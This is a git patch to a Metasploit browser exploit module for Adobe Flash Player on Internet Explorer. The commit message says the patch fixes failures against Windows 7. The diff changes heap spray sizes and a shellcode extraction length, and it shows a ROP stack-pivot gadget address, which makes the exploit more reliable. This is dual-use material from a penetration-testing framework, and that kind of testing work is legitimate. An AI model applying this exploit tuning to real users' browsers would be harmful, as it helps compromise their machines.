From 2b3a2771247de6612014ff098b5be90d5d85b2f6 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 27 Sep 2011 08:55:07 +0000 Subject: [PATCH] Found an instance that causes the win 7 target to fail. This fix corrects it. git-svn-id: file:///home/svn/framework3/trunk@13797 4d416f70-5f16-0410-b530-b9f4589650da --- .../exploits/windows/browser/adobe_flashplayer_flash10o.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index 7222ebcb2d..b2a15b333f 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -109,8 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll) 'Offset1' => '0x5F4', #Offset for rop+payload 'Offset2' => '0x02', #Offset to 0x11111110 - 'Max1' => '0x150', #First spray - 'Max2' => '0x200' #Second spray + 'Max1' => '0x101', #First spray + 'Max2' => '0x300' #Second spray } ] ], @@ -123,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true]) ], self.class ) + end def exploit @@ -232,7 +233,7 @@ class Metasploit3 < Msf::Exploit::Remote #Extract string based on target if my_target.name == 'IE 8 on Windows 7' - js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);" + js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);" elsif my_target.name == 'IE 8 on Windows XP SP3' js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);" else